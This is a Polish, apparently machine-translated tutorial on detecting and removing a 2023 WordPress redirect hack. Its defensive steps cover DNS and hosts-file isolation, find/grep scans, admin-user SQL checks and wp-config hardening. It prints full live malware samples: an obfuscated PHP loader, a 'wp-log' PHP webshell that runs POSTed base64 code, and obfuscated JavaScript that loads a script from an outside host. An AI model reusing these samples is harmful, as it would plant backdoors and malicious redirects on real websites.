Fix Redirect WordPress Hack 2023 (Virus Redirect)

WordPress jest to zdecydowanie najczęściej używana platforma CMS (Content Management System) zarówno dla blogów, jak i startowych sklepów internetowych (z modułem WooCommerce), co czyni go najczęściej celem ataków komputerowych (hakowanie). Jedna z najczęściej stosowanych operacji hakerskich ma na celu przekierowanie zaatakowanej witryny na inne strony internetowe. Redirect WordPress Hack 2023 to stosunkowo nowe złośliwe oprogramowanie, którego skutkiem jest przekierowywanie całej witryny na strony ze spamem lub infekowanie komputerów użytkowników.

Jeśli Twoja witryna rozwinęła się WordPress zostanie przekierowany na inną stronę, najprawdopodobniej jest ofiarą znanego już włamania do przekierowania.

W tym samouczku znajdziesz niezbędne informacje i przydatne wskazówki, dzięki którym możesz odwirusować stronę zainfekowaną przekierowaniem WordPress Hack (Virus Redirect). Dzięki komentarzom możesz uzyskać dodatkowe informacje lub poprosić o pomoc.

Zawartość

Wykrywanie wirusa przekierowującego strony WordPress

Nagły i nieuzasadniony spadek ruchu na stronie, spadek liczby zamówień (w przypadku sklepów internetowych) czy wpływów z reklam to pierwsze sygnały, że coś jest nie tak. Wykrywanie "Redirect WordPress Hack 2023” (Virus Redirect) można również wykonać „wizualnie”, gdy otwierasz witrynę internetową i zostajesz przekierowany na inną stronę internetową.

Z doświadczenia wynika, że większość złośliwego oprogramowania internetowego jest kompatybilna z przeglądarkami internetowymi: Chrome, Firefox, Edge, Opera. Jeśli jesteś użytkownikiem komputera Mac, wirusy te nie są tak naprawdę widoczne w przeglądarce Safari. System bezpieczeństwa od Safari po cichu blokować te złośliwe skrypty.

Co zrobić, jeśli masz zainfekowaną witrynę Redirect WordPress Hack

Mam nadzieję, że pierwszym krokiem nie jest panika ani usunięcie strony. Nawet zainfekowane lub zainfekowane pliki nie powinny być usuwane na początku. Zawierają cenne informacje, które mogą pomóc Ci zrozumieć, gdzie doszło do naruszenia bezpieczeństwa i co wpłynęło na wirusa. Modus operandi.

Zamknij stronę internetową dla publiczności.

Jak zamknąć witrynę zawierającą wirusy dla odwiedzających? Najprościej jest użyć menedżera DNS i usunąć adres IP dla „A” (nazwa domeny) lub zdefiniować nieistniejący adres IP. W ten sposób osoby odwiedzające witrynę będą przed tym chronione redirect WordPress hack które mogą prowadzić ich do stron zawierających wirusy lub SPAM.

Jeśli użyjesz CloudFlare jako menedżer DNS logujesz się na konto i usuwasz rekordy DNS "A” dla nazwy domeny. W ten sposób domena dotknięta wirusem pozostanie bez adresu IP i nie będzie już dostępna z Internetu.

Kopiujesz adres IP strony internetowej i „przekierowujesz” ją tak, aby tylko Ty miał do niej dostęp. Z Twojego komputera.

Jak zmienić prawdziwy adres IP strony internetowej na komputerach Windows?

Ta metoda jest często używana do blokowania dostępu do niektórych stron internetowych poprzez edycję pliku „hosts”.

1. Otwierasz Notepad lub inny edytor tekstu (z prawami administrator) i edytuj plik „hosts". To jest zlokalizowane w:

C:\Windows\System32\drivers\etc\hosts

2. W pliku „hosts” dodaj „route” do prawdziwego adresu IP swojej witryny. Adres IP usunięty powyżej z menedżera DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Zapisz plik i wejdź na stronę w przeglądarce.

Jeśli witryna się nie otwiera i nie zrobiłeś nic złego w pliku „hosts”, najprawdopodobniej jest to pamięć podręczna DNS.

Aby wyczyścić pamięć podręczną DNS w systemie operacyjnym Windows, otwarty Command Prompt, gdzie uruchamiasz polecenie:

ipconfig /flushdns

Jak zmienić prawdziwy adres IP strony internetowej na komputerach Mac / MacKsiążka?

Dla użytkowników komputerów Mac nieco łatwiej jest zmienić prawdziwy adres IP strony internetowej.

1. Otwórz narzędzie Terminal.

2. Uruchom wiersz poleceń (do uruchomienia wymagane jest hasło systemowe):

sudo nano /etc/hosts

3. Tak samo jak w przypadku komputerów Windows, dodaj prawdziwy adres IP domeny.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Zapisz zmiany. Ctrl+X (y).

Po „przekierowaniu” jesteś jedyną osobą, która może uzyskać dostęp do zainfekowanej strony internetowej Redirect WordPress Hack.

Pełna kopia zapasowa strony – Pliki i baza danych

Nawet jeśli jest zainfekowany „redirect WordPress hack”, zaleca się wykonanie ogólnej kopii zapasowej całej witryny. Pliki i baza danych. Być może możesz również zapisać lokalną kopię obu plików z public / public_html podobnie jak baza danych.

Identyfikacja zainfekowanych plików i zmodyfikowanych przez Redirect WordPress Hack 2023

Główne pliki docelowe WordPress są index.php (w korzeniu), header.php, index.php şi footer.php tematu WordPress aktywa. Ręcznie sprawdź te pliki i zidentyfikuj złośliwy kod lub skrypt złośliwego oprogramowania.

W 2023 roku wirus „Redirect WordPress Hack" Putin index.php kod postaci:

(Nie polecam uruchamiania tych kodów!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Rozszyfrowane, to złośliwy skrypt jest to w zasadzie konsekwencja zainfekowania strony internetowej WordPress. To nie skrypt stoi za złośliwym oprogramowaniem, to skrypt, który umożliwia przekierowanie zainfekowanej strony internetowej. Jeśli zdekodujemy powyższy skrypt, otrzymamy:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Aby zidentyfikować wszystkie pliki na serwerze, które zawierają ten kod, dobrze jest mieć dostęp SSH do serwera, aby uruchomić wiersze poleceń sprawdzania i zarządzania plikami Linux.

Związane z: Jak dowiedzieć się, czy Twój blog jest zainfekowany, czy nie, z pomocą Google Search , (WordPress Wirus)

Poniżej znajdują się dwa polecenia, które są zdecydowanie pomocne w identyfikacji ostatnio modyfikowanych plików oraz plików zawierających określony kod (ciąg znaków).

Jak widzisz na Linux Pliki PHP zmieniły się w ciągu ostatnich 24 godzin lub w innym przedziale czasowym?

Zamówienie "find” jest bardzo prosty w użyciu i umożliwia dostosowanie do ustawień przedziału czasu, ścieżki wyszukiwania i rodzaju plików.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Na wyjściu otrzymasz informację o dacie i godzinie modyfikacji pliku, uprawnieniach zapisu/odczytu/wykonania (chmod) i do której grupy/użytkownika należy.

Jeśli chcesz sprawdzić więcej dni temu, zmień wartość "-mtime -1" albo użyj "-mmin -360” przez kilka minut (6 godzin).

Jak wyszukać kod (ciąg znaków) w plikach PHP, Java?

Wiersz polecenia „znajdź”, który pozwala szybko znaleźć wszystkie pliki PHP lub Java zawierające określony kod, wygląda następująco:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Polecenie wyszuka i wyświetli pliki .php şi .js zawierający "uJjBRODYsU".

Za pomocą dwóch powyższych poleceń bardzo łatwo dowiesz się, które pliki były ostatnio modyfikowane, a które zawierają kod złośliwego oprogramowania.

Usuwa złośliwy kod ze zmodyfikowanych plików bez narażania prawidłowego kodu. W moim scenariuszu złośliwe oprogramowanie zostało umieszczone przed otwarciem <head>.

Podczas wykonywania pierwszego polecenia „znajdź” bardzo możliwe jest odkrycie nowych plików na serwerze, które nie należą do Ciebie WordPress ani umieszczone tam przez ciebie. Pliki należące do typu wirusa Redirect WordPress Hack.

W badanym przeze mnie scenariuszu pliki w formacie „wp-log-nOXdgD.php". Są to pliki „spawn”, które zawierają również kod złośliwego oprogramowania używany przez wirusa do przekierowania.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Przeznaczenie plików typu „wp-log-*” polega na rozprzestrzenianiu wirusa przekierowania na inne witryny hostowane na serwerze. Jest to kod złośliwego oprogramowania typu „webshell„składający się z sekcja podstawowa (w którym zdefiniowane są niektóre zaszyfrowane zmienne) oraz o sekcja egzekucyjna przez które atakujący próbuje załadować i wykonać złośliwy kod w systemie.

Jeśli istnieje zmienna POST o imieniu 'bh' i jego zaszyfrowaną wartość MD5 jest równe "8f1f964a4b4d8d1ac3f0386693d28d03", pojawi się skrypt, aby zapisać zaszyfrowaną zawartość base64 innej zmiennej o nazwie „b3' w pliku tymczasowym, a następnie próbuje dołączyć ten plik tymczasowy.

Jeśli istnieje zmienna POST lub GET o imieniu 'tick', skrypt odpowie wartością MD5 ze sznurka"885".

Aby zidentyfikować wszystkie pliki na serwerze, które zawierają ten kod, wybierz wspólny ciąg, a następnie uruchom polecenie „find” (podobny do powyższego). Usuń wszystkie pliki zawierające ten kod złośliwego oprogramowania.

Luka w zabezpieczeniach wykorzystana przez Redirect WordPress Hack

Najprawdopodobniej ten wirus przekierowania przybywa przez wykorzystywanie użytkownika administracyjnego WordPress lub identyfikując a wrażliwa wtyczka który umożliwia dodawanie użytkowników z uprawnieniami administrator.

Dla większości witryn zbudowanych na platformie WordPress to jest możliwe edytowanie motywów lub plików wtyczekz interfejsu administracyjnego (Dashboard). W ten sposób złośliwa osoba może dodać kod złośliwego oprogramowania do plików motywu, aby wygenerować skrypty pokazane powyżej.

Przykład takiego kodu złośliwego oprogramowania jest następujący:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript zidentyfikowane w nagłówku motywu WordPress, natychmiast po otwarciu etykiety <head>.

Odszyfrowanie tego kodu JavaScript jest dość trudne, ale oczywiste jest, że wysyła zapytanie do innego adresu internetowego, skąd najprawdopodobniej pobiera inne skrypty w celu utworzenia plików "wp-log-*”, o którym mówiłem powyżej.

Znajdź i usuń ten kod ze wszystkich plików PHP dotknięty.

O ile mogłem stwierdzić, ten kod był dodane ręcznie przez nowego użytkownika z uprawnieniami administratora.

Aby więc zapobiec dodawaniu złośliwego oprogramowania z Dashboardu, najlepiej wyłączyć opcję edycji WordPress Motywy / wtyczki z pulpitu nawigacyjnego.

Edytuj plik wp-config.php i dodaj linie:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Po wprowadzeniu tej zmiany żaden użytkownik WordPress nie będziesz już mógł edytować plików z pulpitu nawigacyjnego.

Sprawdź użytkowników z rolą Administrator

Poniżej znajduje się zapytanie SQL, którego możesz użyć do wyszukania użytkowników z rolą administrator w platformie WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

To zapytanie zwróci wszystkich użytkowników w tabeli wp_users który wyznaczył rolę administrator. Zapytanie jest również wykonywane dla tabeli wp_usermeta szukać w meta 'wp_capabilities', który zawiera informacje o rolach użytkowników.

Inną metodą jest ich identyfikacja na podstawie: Dashboard → Users → All Users → Administrator. Istnieją jednak praktyki, dzięki którym użytkownik może zostać ukryty w panelu Dashboard. Najlepszy sposób, aby zobaczyć użytkowników ”Administrator"W WordPress to powyższe polecenie SQL.

W moim przypadku zidentyfikowałem w bazie danych użytkownika o nazwie „wp-import-user". Dość sugestywne.

Zły użytkownik złośliwego oprogramowania WP

Również stąd możesz zobaczyć datę i godzinę, kiedy użytkownik WordPress powstał. Identyfikator użytkownika jest również bardzo ważny, ponieważ przeszukuje logi serwera. W ten sposób możesz zobaczyć całą aktywność tego użytkownika.

Usuń użytkowników z rolą administrator których w takim razie nie znasz zmieniać hasła wszystkim użytkownikom administracyjnym. redaktor, autor, Administrator.

Zmień hasło użytkownika bazy danych SQL strony internetowej, której dotyczy problem.

Po wykonaniu tych kroków witryna może zostać ponownie uruchomiona dla wszystkich użytkowników.

Pamiętaj jednak, że to, co przedstawiłem powyżej, to jeden z być może tysięcy scenariuszy, w których zainfekowana jest strona internetowa Redirect WordPress Hack w 2023 roku.

Jeśli Twoja witryna została zainfekowana i potrzebujesz pomocy lub masz jakieś pytania, sekcja komentarzy jest otwarta.